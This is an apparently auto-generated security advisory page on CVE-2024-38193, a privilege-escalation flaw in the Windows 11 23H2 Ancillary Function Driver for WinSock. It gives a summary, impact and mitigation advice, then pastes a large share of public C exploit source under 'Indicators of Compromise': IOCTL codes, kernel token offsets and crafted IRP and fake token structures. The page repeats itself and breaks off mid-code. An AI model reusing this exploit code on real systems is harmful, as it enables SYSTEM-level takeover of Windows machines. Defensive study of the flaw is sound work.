Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

Severity: highType: exploit

AI Analysis

Technical Summary

This security threat concerns a local privilege escalation vulnerability in Microsoft Windows 11 Pro version 23H2, specifically targeting the Ancillary Function Driver (AFD) for WinSock, identified as CVE-2024-38193. The vulnerability resides in the AFD device driver, which is responsible for network socket operations in Windows. The exploit leverages improper handling of IOCTL (Input Output Control) requests to the AFD driver, allowing a local attacker to escalate privileges from a lower-privileged user context to SYSTEM level. The exploit code, written in C, manipulates internal kernel structures and crafted IRP (I/O Request Packets) to gain arbitrary kernel memory read/write capabilities. It abuses specific IOCTL codes such as IOCTL_AFD_BIND, IOCTL_AFD_LISTEN, and IOCTL_AFD_CONNECT to interact with the AFD driver. The exploit crafts fake token structures and manipulates security attributes to impersonate higher-privileged tokens, effectively granting SYSTEM privileges. The code includes detailed kernel data structures and offsets, indicating a deep understanding of Windows kernel internals, including token privileges, security descriptors, and process token manipulation. No authentication or user interaction is required beyond local code execution, making it a powerful escalation vector for attackers who have already compromised a low-privilege account. Although no patches or mitigations are linked yet, the exploit demonstrates a reliable method to bypass Windows security boundaries via the AFD driver.

Potential Impact

For European organizations, this vulnerability poses a significant risk as it allows attackers with local access to escalate privileges to SYSTEM level, potentially leading to full system compromise. This can facilitate lateral movement, persistence, and deployment of ransomware or espionage tools within corporate networks. Organizations relying on Windows 11 Pro 23H2, especially in environments where users have local access or where endpoint security is weak, are at risk. The exploit can be used post-initial compromise to elevate privileges and disable security controls, extract sensitive data, or disrupt operations. Given the prevalence of Windows 11 Pro in enterprise environments across Europe, this vulnerability could be leveraged in targeted attacks against critical infrastructure, government agencies, and private sector companies. The lack of known exploits in the wild currently suggests limited immediate threat, but the public availability of exploit code increases the risk of rapid weaponization.

Mitigation Recommendations

Apply any forthcoming Microsoft security updates promptly once available, as this vulnerability affects a core Windows driver. Implement strict local user access controls and minimize the number of users with local login rights on critical systems. Use application control policies (e.g., Microsoft Defender Application Control) to restrict execution of unauthorized binaries and scripts, reducing the chance of exploit execution. Deploy Endpoint Detection and Response (EDR) solutions capable of detecting abnormal kernel-level operations or suspicious IOCTL calls to the AFD driver. Monitor system logs and kernel event tracing for unusual activity related to AFD device interactions or token manipulations. Consider enabling Windows Defender Credential Guard and virtualization-based security features to harden token and credential protections. Restrict use of legacy or unnecessary network protocols that rely on the AFD driver where possible to reduce attack surface. Conduct regular privilege audits and enforce the principle of least privilege to limit potential impact of local exploits.

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Sweden, Belgium, Austria

Indicators of Compromise

exploit-code: # Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation # Date: 2025-05-05 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win x64 # CVE : CVE-2024-38193 #pragma once #include "ntstatus.h" #include "Windows.h" #include <iostream> #pragma comment(lib, "ntdll.lib") #define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF)) #define LODWORD(l) ((DWORD)((DWORDLONG)(l))) #define AfdOpenPacket "AfdOpenPacketXX" #define AFD_DEVICE_NAME L"\\Device\\Afd" #define LOCALHOST "127.0.0.1" #define IOCTL_AFD_BIND 0x12003LL #define IOCTL_AFD_LISTEN 0x1200BLL #define IOCTL_AFD_CONNECT 0x120BBLL #define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL #define FSCTL_PIPE_PEEK 0x11400CLL #define FSCTL_PIPE_IMPERSONATE 0x11001CLL #define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8 #define OBJ_CASE_INSENSITIVE 0x00000040 #define OBJ_INHERIT 0x00000002 #define FILE_OPEN_IF 0x3 #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) #define OFFSET_IN_TOKEN_VARIABLEPART 0x490 #define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40 #define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8 #define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0 #define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8 #define PREVIOUS_MODE_OFFSET 0x232 #define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448 #define OFFSET_TO_TOKEN 0x4b8 #define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE typedef struct IO_STATUS_BLOCK { union { DWORD Status; PVOID Pointer; }; DWORD* Information; }; //0x4 bytes (sizeof) struct _SYSTEM_POWER_STATE_CONTEXT { union { struct { ULONG Reserved1 : 8; //0x0 ULONG TargetSystemState : 4; //0x0 ULONG EffectiveSystemState : 4; //0x0 ULONG CurrentSystemState : 4; //0x0 ULONG IgnoreHibernationPath : 1; //0x0 ULONG PseudoTransition : 1; //0x0 ULONG KernelSoftReboot : 1; //0x0 ULONG DirectedDripsTransition : 1; //0x0 ULONG Reserved2 : 8; //0x0 }; ULONG ContextAsUlong; //0x0 }; }; //0x4 bytes (sizeof) union _POWER_STATE { enum _SYSTEM_POWER_STATE SystemState; //0x0 enum _DEVICE_POWER_STATE DeviceState; //0x0 }; //0x48 bytes (sizeof) typedef struct _IO_STACK_LOCATION { UCHAR MajorFunction; //0x0 UCHAR MinorFunction; //0x1 UCHAR Flags; //0x2 UCHAR Control; //0x3 union { struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT FileAttributes; //0x18 USHORT ShareAccess; //0x1a ULONG EaLength; //0x20 } Create; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20 } CreatePipe; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20 } CreateMailslot; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Read; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Write; //0x8 struct { ULONG Length; //0x8 struct _UNICODE_STRING* FileName; //0x10 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18 ULONG FileIndex; //0x20 } QueryDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 } NotifyDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18 } NotifyDirectoryEx; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 } QueryFile; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 struct _FILE_OBJECT* FileObject; //0x18 union { struct { UCHAR ReplaceIfExists; //0x20 UCHAR AdvanceOnly; //0x21 }; ULONG ClusterCount; //0x20 VOID* DeleteHandle; //0x20 }; } SetFile; //0x8 struct { ULONG Length; //0x8 VOID* EaList; //0x10 ULONG EaListLength; //0x18 ULONG EaIndex; //0x20 } QueryEa; //0x8 struct { ULONG Length; //0x8 } SetEa; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } QueryVolume; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } SetVolume; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG FsControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } FileSystemControl; //0x8 struct { union _LARGE_INTEGER* Length; //0x8 ULONG Key; //0x10 union _LARGE_INTEGER ByteOffset; //0x18 } LockControl; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG IoControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } DeviceIoControl; //0x8 struct { ULONG SecurityInformation; //0x8 ULONG Length; //0x10 } QuerySecurity; //0x8 struct { ULONG SecurityInformation; //0x8 VOID* SecurityDescriptor; //0x10 } SetSecurity; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } MountVolume; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } VerifyVolume; //0x8 struct { struct _SCSI_REQUEST_BLOCK* Srb; //0x8 } Scsi; //0x8 struct { ULONG Length; //0x8 VOID* StartSid; //0x10 struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18 ULONG SidListLength; //0x20 } QueryQuota; //0x8 struct { ULONG Length; //0x8 } SetQuota; //0x8 struct { enum _DEVICE_RELATION_TYPE Type; //0x8 } QueryDeviceRelations; //0x8 struct { struct _GUID* InterfaceType; //0x8 USHORT Size; //0x10 USHORT Version; //0x12 struct _INTERFACE* Interface; //0x18 VOID* InterfaceSpecificData; //0x20 } QueryInterface; //0x8 struct { struct _DEVICE_CAPABILITIES* Capabilities; //0x8 } DeviceCapabilities; //0x8 struct { struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8 } FilterResourceRequirements; //0x8 struct { ULONG WhichSpace; //0x8 VOID* Buffer; //0x10 ULONG Offset; //0x18 ULONG Length; //0x20 } ReadWriteConfig; //0x8 struct { UCHAR Lock; //0x8 } SetLock; //0x8 struct { enum BUS_QUERY_ID_TYPE IdType; //0x8 } QueryId; //0x8 struct { enum DEVICE_TEXT_TYPE DeviceTextType; //0x8 ULONG LocaleId; //0x10 } QueryDeviceText; //0x8 struct { UCHAR InPath; //0x8 UCHAR Reserved[3]; //0x9 enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10 } UsageNotification; //0x8 struct { enum _SYSTEM_POWER_STATE PowerState; //0x8 } WaitWake; //0x8 struct { struct _POWER_SEQUENCE* PowerSequence; //0x8 } PowerSequence; //0x8 struct { union { ULONG SystemContext; //0x8 struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8 }; enum _POWER_STATE_TYPE Type; //0x10 union _POWER_STATE State; //0x18 enum POWER_ACTION ShutdownType; //0x20 } Power; //0x8 struct { struct _CM_RESOURCE_LIST* AllocatedResources; //0x8 struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10 } StartDevice; //0x8 struct { ULONGLONG ProviderId; //0x8 VOID* DataPath; //0x10 ULONG BufferSize; //0x18 VOID* Buffer; //0x20 } WMI; //0x8 struct { VOID* Argument1; //0x8 VOID* Argument2; //0x10 VOID* Argument3; //0x18 VOID* Argument4; //0x20 } Others; //0x8 } Parameters; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x28 struct _FILE_OBJECT* FileObject; //0x30 LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38 VOID* Context; //0x40 }IO_STACK_LOCATION; //0x18 bytes (sizeof) struct _KDEVICE_QUEUE_ENTRY { struct _LIST_ENTRY DeviceListEntry; //0x0 ULONG SortKey; //0x10 UCHAR Inserted; //0x14 }; //0x58 bytes (sizeof) struct _KAPC { UCHAR Type; //0x0 UCHAR AllFlags; //0x1 UCHAR Size; //0x2 UCHAR SpareByte1; //0x3 ULONG SpareLong0; //0x4 struct _KTHREAD* Thread; //0x8 struct _LIST_ENTRY ApcListEntry; //0x10 VOID* Reserved[3]; //0x20 VOID* NormalContext; //0x38 VOID* SystemArgument1; //0x40 VOID* SystemArgument2; //0x48 CHAR ApcStateIndex; //0x50 CHAR ApcMode; //0x51 UCHAR Inserted; //0x52 }; //0xd0 bytes (sizeof) struct _IRP { SHORT Type; //0x0 USHORT Size; //0x2 USHORT AllocationProcessorNumber; //0x4 USHORT Reserved; //0x6 struct _MDL* MdlAddress; //0x8 ULONG Flags; //0x10 union { struct _IRP* MasterIrp; //0x18 LONG IrpCount; //0x18 VOID* SystemBuffer; //0x18 } AssociatedIrp; //0x18 struct _LIST_ENTRY ThreadListEntry; //0x20 struct IO_STATUS_BLOCK IoStatus; //0x30 CHAR RequestorMode; //0x40 UCHAR PendingReturned; //0x41 CHAR StackCount; //0x42 CHAR CurrentLocation; //0x43 UCHAR Cancel; //0x44 UCHAR CancelIrql; //0x45 CHAR ApcEnvironment; //0x46 UCHAR AllocationFlags; //0x47 union { struct _IO_STATUS_BLOCK* UserIosb; //0x48 VOID* IoRingContext; //0x48 }; struct _KEVENT* UserEvent; //0x50 union { struct { union { VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58 VOID* IssuingProcess; //0x58 }; union { VOID* UserApcContext; //0x60 struct _IORING_OBJECT* IoRing; //0x60 }; } AsynchronousParameters; //0x58 union _LARGE_INTEGER AllocationSize; //0x58 } Overlay; //0x58 VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68 VOID* UserBuffer; //0x70 union { struct { union { struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78 VOID* DriverContext[4]; //0x78 }; struct _ETHREAD* Thread; //0x98 CHAR* AuxiliaryBuffer; //0xa0 struct _LIST_ENTRY ListEntry; //0xa8 union { struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8 ULONG PacketType; //0xb8 }; struct _FILE_OBJECT* OriginalFileObject; //0xc0 VOID* IrpExtension; //0xc8 } Overlay; //0x78 struct _KAPC Apc; //0x78 VOID* CompletionKey; //0x78 } Tail; //0x78 }; typedef struct _TA_ADDRESS { USHORT AddressLength; USHORT AddressType; UCHAR Address[1]; }TA_ADDRESS; typedef struct _TRANSPORT_ADDRESS { LONG TAAddressCount; TA_ADDRESS Address[1]; }TRANSPORT_ADDRESS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; }OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef struct _SYSTEM_MODULE_ENTRY { HANDLE Section; PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[256]; } SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { PVOID Object; ULONG_PTR UniqueProcessId; ULONG_PTR HandleValue; ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; typedef struct _AFD_CREATE_PACKET { //FILE_FULL_EA_INFORMATION ULONG NextEntryOffset; WORD Flags; UCHAR EaNameLength; USHORT EaValueLength; CHAR EaName[15]; //AFD_CREATE_PACKET ULONG EndpointFlags; ULONG GroupID; ULONG AddressFamily; ULONG SocketType; ULONG Protocol; ULONG SizeOfTransportName; wchar_t TransportName[16]; //UCHAR Unkown; } AFD_CREATE_PACKET; enum THREADINFOCLASS { ThreadImpersonationToken = 5 }; enum SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemExtendedHandleInformation = 64 }; typedef enum EVENT_TYPE { NotificationEvent, SynchronizationEvent }; typedef struct _AFD_BIND_DATA { ULONG ShareType; SOCKADDR_IN addr; } AFD_BIND_DATA, * PAFD_BIND_DATA; typedef struct alignas(16) MY_AFD_CONNECT_INFO { __int64 UseSan; __int64 hNtSock1; __int64 Unknown; __int32 tmp6; WORD const_16; sockaddr_in bind; }; typedef struct FAKE_DATA_ENTRY_QUEUE { DWORD tmp; LIST_ENTRY nextQueue; __int64 unknown; PVOID security_client_context; __int64 unknown2; __int64 sizeOfData; char DATA[0x77FD0]; }; typedef struct _AFD_LISTEN_INFO { ULONG unknown; __int64 MaximumConnectionQueue; } AFD_LISTEN_INFO, * PAFD_LISTEN_INFO; typedef struct _SECURITY_CLIENT_CONTEXT { _SECURITY_QUALITY_OF_SERVICE SecurityQos; void* ClientToken; unsigned __int8 DirectlyAccessClientToken; unsigned __int8 DirectAccessEffectiveOnly; unsigned __int8 ServerIsRemote; _TOKEN_CONTROL ClientTokenControl; }SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT; struct __declspec(align(8)) _OWNER_ENTRY { unsigned __int64 OwnerThread; DWORD ___u1; }; //0x68 bytes (sizeof) typedef struct _ERESOURCE { struct _LIST_ENTRY SystemResourcesList; //0x0 struct _OWNER_ENTRY* OwnerTable; //0x10 SHORT ActiveCount; //0x18 union { USHORT Flag; //0x1a struct { UCHAR ReservedLowFlags; //0x1a UCHAR WaiterPriority; //0x1b }; }; VOID* SharedWaiters; //0x20 VOID* ExclusiveWaiters; //0x28 struct _OWNER_ENTRY OwnerEntry; //0x30 ULONG ActiveEntries; //0x40 ULONG ContentionCount; //0x44 ULONG NumberOfSharedWaiters; //0x48 ULONG NumberOfExclusiveWaiters; //0x4c VOID* Reserved2; //0x50 union { VOID* Address; //0x58 ULONGLONG CreatorBackTraceIndex; //0x58 }; ULONGLONG SpinLock; //0x60 }ERESOURCE, *PERESOURCE; //0x8 bytes (sizeof) typedef struct _EX_PUSH_LOCK { union { struct { ULONGLONG Locked : 1; //0x0 ULONGLONG Waiting : 1; //0x0 ULONGLONG Waking : 1; //0x0 ULONGLONG MultipleShared : 1; //0x0 ULONGLONG Shared : 60; //0x0 }; ULONGLONG Value; //0x0 VOID* Ptr; //0x0 }; }; //0x10 bytes (sizeof) typedef struct _SEP_CACHED_HANDLES_TABLE { struct _EX_PUSH_LOCK Lock; //0x0 struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8 }; //0x8 bytes (sizeof) typedef struct _EX_RUNDOWN_REF { union { ULONGLONG Count; //0x0 VOID* Ptr; //0x0 }; }; //0x20 bytes (sizeof) typedef struct _OB_HANDLE_REVOCATION_BLOCK { struct _LIST_ENTRY RevocationInfos; //0x0 struct _EX_PUSH_LOCK Lock; //0x10 struct _EX_RUNDOWN_REF Rundown; //0x18 }; //0xc0 bytes (sizeof) typedef struct _SEP_LOGON_SESSION_REFERENCES { struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0 struct _LUID LogonId; //0x8 struct _LUID BuddyLogonId; //0x10 LONGLONG ReferenceCount; //0x18 ULONG Flags; //0x20 struct _DEVICE_MAP* pDeviceMap; //0x28 VOID* Token; //0x30 struct _UNICODE_STRING AccountName; //0x38 struct _UNICODE_STRING AuthorityName; //0x48 struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58 struct _EX_PUSH_LOCK SharedDataLock; //0x68 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70 struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78 struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80 struct _EJOB* ServerSilo; //0xa0 struct _LUID SiblingAuthId; //0xa8 struct _LIST_ENTRY TokenList; //0xb0 }; //0x30 bytes (sizeof) typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION { ULONG SecurityAttributeCount; //0x0 struct _LIST_ENTRY SecurityAttributesList; //0x8 ULONG WorkingSecurityAttributeCount; //0x18 struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20 }AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION; //0x20 bytes (sizeof) typedef struct _SEP_SID_VALUES_BLOCK { ULONG BlockLength; //0x0 LONGLONG ReferenceCount; //0x8 ULONG SidCount; //0x10 ULONGLONG SidValuesStart; //0x18 }SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK; //0x18 bytes (sizeof) struct _SEP_TOKEN_PRIVILEGES { ULONGLONG Present; //0x0 ULONGLONG Enabled; //0x8 ULONGLONG EnabledByDefault; //0x10 }; //0x1f bytes (sizeof) struct _SEP_AUDIT_POLICY { struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0 UCHAR PolicySetStatus; //0x1e }; //0x498 bytes (sizeof) struct _TOKEN { struct _TOKEN_SOURCE TokenSource; //0x0 struct _LUID TokenId; //0x10 struct _LUID AuthenticationId; //0x18 struct _LUID ParentTokenId; //0x20 union _LARGE_INTEGER ExpirationTime; //0x28 struct _ERESOURCE* TokenLock; //0x30 struct _LUID ModifiedId; //0x38 struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40 struct _SEP_AUDIT_POLICY AuditPolicy; //0x58 ULONG SessionId; //0x78 ULONG UserAndGroupCount; //0x7c ULONG RestrictedSidCount; //0x80 ULONG VariableLength; //0x84 ULONG DynamicCharged; //0x88 ULONG DynamicAvailable; //0x8c ULONG DefaultOwnerIndex; //0x90 struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98 struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0 VOID* PrimaryGroup; //0xa8 ULONG* DynamicPart; //0xb0 struct _ACL* DefaultDacl; //0xb8 enum _TOKEN_TYPE TokenType; //0xc0 enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4 ULONG TokenFlags; //0xc8 UCHAR TokenInUse; //0xcc ULONG IntegrityLevelIndex; //0xd0 ULONG MandatoryPolicy; //0xd4 void* LogonSession; //0xd8 struct _LUID OriginatingLogonSession; //0xe0 struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8 struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8 struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308 VOID* Package; //0x310 struct _SID_AND_ATTRIBUTES* Capabilities; //0x318 ULONG CapabilityCount; //0x320 struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328 struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438 struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448 VOID* TrustLevelSid; //0x450 struct _TOKEN* TrustLinkedToken; //0x458 VOID* IntegrityLevelSidValue; //0x460 struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468 struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470 struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478 struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480 VOID* SessionObject; //0x488 ULONGLONG VariablePart; //0x490 }; //0x38 bytes (sizeof) struct _OBJECT_HEADER { LONGLONG PointerCount; //0x0 union { LONGLONG HandleCount; //0x8 VOID* NextToFree; //0x8 }; struct _EX_PUSH_LOCK Lock; //0x10 UCHAR TypeIndex; //0x18 union { UCHAR TraceFlags; //0x19 struct { UCHAR DbgRefTrace : 1; //0x19 UCHAR DbgTracePermanent : 1; //0x19 }; }; UCHAR InfoMask; //0x1a union { UCHAR Flags; //0x1b struct { UCHAR NewObject : 1; //0x1b UCHAR KernelObject : 1; //0x1b UCHAR KernelOnlyAccess : 1; //0x1b UCHAR ExclusiveObject : 1; //0x1b UCHAR PermanentObject : 1; //0x1b UCHAR DefaultSecurityQuota : 1; //0x1b UCHAR SingleHandleEntry : 1; //0x1b UCHAR DeletedInline : 1; //0x1b }; }; ULONG Reserved; //0x1c union { struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20 VOID* QuotaBlockCharged; //0x20 }; VOID* SecurityDescriptor; //0x28 struct _TOKEN Body; //0x30 }; struct mm { void* fake_data_entry; void* input; _IRP* crafted_irp; IO_STACK_LOCATION *crafted_arbitrary_io_stack_location; void* p_mem_0x30; void* p_mem_0xD0_2; _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; ACL* VariablePartDefaultDacl; ACL* VariablePartDefaultDacl2; _ERESOURCE* TokenLock; void* PrimaryGroup; int sizeOfClientTokenAndObjectHeader; PSEP_SID_VALUES_BLOCK TokenSidValues; _SECURITY_CLIENT_CONTEXT* security_client_context; _SEP_LOGON_SESSION_REFERENCES* LogonSession; _TOKEN* fakeToken; void *pipe_100_im_control_block; void* pipe_100_rw_control_block; void* p_mem_Pipe_hToPipe_1000_rw; void* p_mem_Pipe_hToPipe_1000_rw_2; HANDLE hPipeIM; HANDLE hPipeRW; HANDLE hFileIM; HANDLE hFileRW; HANDLE IncPrimitiveTOKEN; HANDLE RWPrimitiveTOKEN; }; //0x18 bytes (sizeof) struct _DISPATCHER_HEADER { union { volatile LONG Lock; //0x0 LONG LockNV; //0x0 struct { UCHAR Type; //0x0 UCHAR Signalling; //0x1 UCHAR Size; //0x2 UCHAR Reserved1; //0x3 }; struct { UCHAR TimerType; //0x0 union { UCHAR TimerControlFlags; //0x1 struct { UCHAR Absolute : 1;

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

Severity: high

Type: exploit

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Sweden, Belgium, Austria

Indicators of Compromise

exploit-code: # Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation # Date: 2025-05-05 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win x64 # CVE : CVE-2024-38193 #pragma once #include "ntstatus.h" #include "Windows.h" #include <iostream> #pragma comment(lib, "ntdll.lib") #define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF)) #define LODWORD(l) ((DWORD)((DWORDLONG)(l))) #define AfdOpenPacket "AfdOpenPacketXX" #define AFD_DEVICE_NAME L"\\Device\\Afd" #define LOCALHOST "127.0.0.1" #define IOCTL_AFD_BIND 0x12003LL #define IOCTL_AFD_LISTEN 0x1200BLL #define IOCTL_AFD_CONNECT 0x120BBLL #define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL #define FSCTL_PIPE_PEEK 0x11400CLL #define FSCTL_PIPE_IMPERSONATE 0x11001CLL #define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8 #define OBJ_CASE_INSENSITIVE 0x00000040 #define OBJ_INHERIT 0x00000002 #define FILE_OPEN_IF 0x3 #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) #define OFFSET_IN_TOKEN_VARIABLEPART 0x490 #define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40 #define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8 #define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0 #define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8 #define PREVIOUS_MODE_OFFSET 0x232 #define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448 #define OFFSET_TO_TOKEN 0x4b8 #define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE typedef struct IO_STATUS_BLOCK { union { DWORD Status; PVOID Pointer; }; DWORD* Information; }; //0x4 bytes (sizeof) struct _SYSTEM_POWER_STATE_CONTEXT { union { struct { ULONG Reserved1 : 8; //0x0 ULONG TargetSystemState : 4; //0x0 ULONG EffectiveSystemState : 4; //0x0 ULONG CurrentSystemState : 4; //0x0 ULONG IgnoreHibernationPath : 1; //0x0 ULONG PseudoTransition : 1; //0x0 ULONG KernelSoftReboot : 1; //0x0 ULONG DirectedDripsTransition : 1; //0x0 ULONG Reserved2 : 8; //0x0 }; ULONG ContextAsUlong; //0x0 }; }; //0x4 bytes (sizeof) union _POWER_STATE { enum _SYSTEM_POWER_STATE SystemState; //0x0 enum _DEVICE_POWER_STATE DeviceState; //0x0 }; //0x48 bytes (sizeof) typedef struct _IO_STACK_LOCATION { UCHAR MajorFunction; //0x0 UCHAR MinorFunction; //0x1 UCHAR Flags; //0x2 UCHAR Control; //0x3 union { struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT FileAttributes; //0x18 USHORT ShareAccess; //0x1a ULONG EaLength; //0x20 } Create; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20 } CreatePipe; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20 } 